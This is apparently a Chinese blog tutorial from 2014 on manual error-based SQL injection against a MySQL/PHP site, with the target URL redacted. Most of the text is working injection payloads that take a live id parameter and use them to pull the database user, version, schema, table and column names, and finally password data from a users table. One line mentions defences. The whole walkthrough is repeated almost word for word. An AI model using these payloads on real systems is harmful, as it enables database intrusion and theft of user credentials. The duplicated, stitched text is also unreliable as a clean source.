mysql-php基于“错误”的手工注入----(select *)
2014-10-13 10:56
1.注入点:
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前is_dba:(此语句搞错了)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP
BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:个数是166个。提示:table_schema in(0x******************) 中的参数为数据库名称的十六进制表示
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************)
LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT
0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句(此类注入依赖数据库错误信息回显到页面;防御上应对 id 参数使用预处理语句绑定,并在生产环境关闭错误回显):
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分(原文中以颜色标出的参数,此处未保留高亮):根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************)
LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中 column_name=0x****************** 为所查询列字段名称的十六进制表示
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********
AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a)
http://www.******/index.php?********&id=14
2.确定当前用户:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x23232323,(MID((IFNULL(CAST( CURRENT_USER() ASCHAR),0x20)),1,50)),0x23232323,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:*******_dbadmin@localhost
3.确定数据库版本:
AND (SELECT 8471 FROM (SELECT COUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
解析如下:
AND(
SELECT 8471 FROM
(SELECT COUNT(*),
CONCAT(0x716b6b7671,
(MID((IFNULL(CAST(@@version AS CHAR),0x20)),1,50)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x
FROM INFORMATION_SCHEMA.CHARACTER_SETS
GROUP BY x
)a
)
提示错误: 5.5.37-cll
4.确定数据库:
AND (SELECT 8471 FROM (SELECTCOUNT(*),CONCAT(0x716b6b7671,(MID((IFNULL(CAST( DATABASE() ASCHAR),0x20)),1,50)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x) a)
提示错误:******_web
5.确定当前is_dba:(此语句搞错了)
AND (SELECT 3040 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT (CASE WHEN ((SELECT super_priv FROM mysql.user WHERE user=0x616f7061636f5f646261646d696e LIMIT 0,1)=0x59) THEN 1ELSE 0 END)),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP
BY x)a)
6.确定数据库中的表个数及其名称:
AND (SELECT 4537 FROM(SELECTCOUNT(*),CONCAT(0x716b6b7671,(SELECT IFNULL(CAST(COUNT(table_name) ASCHAR),0x20) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN(0x***************)),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
提示错误:个数是166个。提示:table_schema in(0x******************) 中的参数为数据库名称的十六进制表示
以此确定每个表的名称:
AND(SELECT 7765 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(table_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.TABLES WHERE table_schema IN (0x*******************)
LIMIT0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETSGROUP BY x)a)
---- 提示:limit 0,1是确定表名称的次序。0,1表示第一个表名称;1,1表示第二个表名称;33,1表示第34个表的名称。提示table_name=0x6a74626c5f7573657273 AND table_schema=0x******************,第一个参数为表名称,第二个参数数据库名称
提示错误:
7.确定表的列数及其名称:
AND(SELECT 1107 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTIFNULL(CAST(COUNT(*)AS CHAR),0x20) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*************************),0x7166646b71,FLOOR(RAND(0)*2))x
FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
依次确定列名称:
AND(SELECT 8709 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECTMID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x*********************LIMIT
0,1),0x7166646b71,FLOOR(RAND(0)*2))xFROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
解析基于错误的SQL语句(此类注入依赖数据库错误信息回显到页面;防御上应对 id 参数使用预处理语句绑定,并在生产环境关闭错误回显):
解析结果如下:
SELECT 4537 FROM
(
SELECT COUNT(*),
CONCAT(
0x716b6b7671,
(SELECT IFNULL(CAST(COUNT(table_name) AS CHAR),0x20)
FROM INFORMATION_SCHEMA.TABLES
WHERE table_schema IN (0x*****************)),
0x7166646b71,
FLOOR(RAND(0)*2)
)x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x
)a
红色部分(原文中以颜色标出的参数,此处未保留高亮):根据个人需求变化
8.查询指定列字段名
14 AND (SELECT 3313 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_name AS CHAR),0x20)),1,50) FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********************** AND (column_name=0x******************)
LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
语句中 column_name=0x****************** 为所查询列字段名称的十六进制表示
9.查询指定列字段的数据类型
AND (SELECT 6785 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(column_type AS CHAR),0x20)),1,50)FROM INFORMATION_SCHEMA.COLUMNS WHERE table_name=0x6a74626c5f7573657273 AND table_schema=0x********
AND (column_name=0x70617373776f7264) LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
10.查询内部用户的信息:
AND (SELECT 3225 FROM(SELECT COUNT(*),CONCAT(0x716b6b7671,(SELECT MID((IFNULL(CAST(columns_name AS CHAR),0x20)),1,50) FROM *****_web.jtbl_users where username=0x6164616d LIMIT 0,1),0x7166646b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP
BY x)a)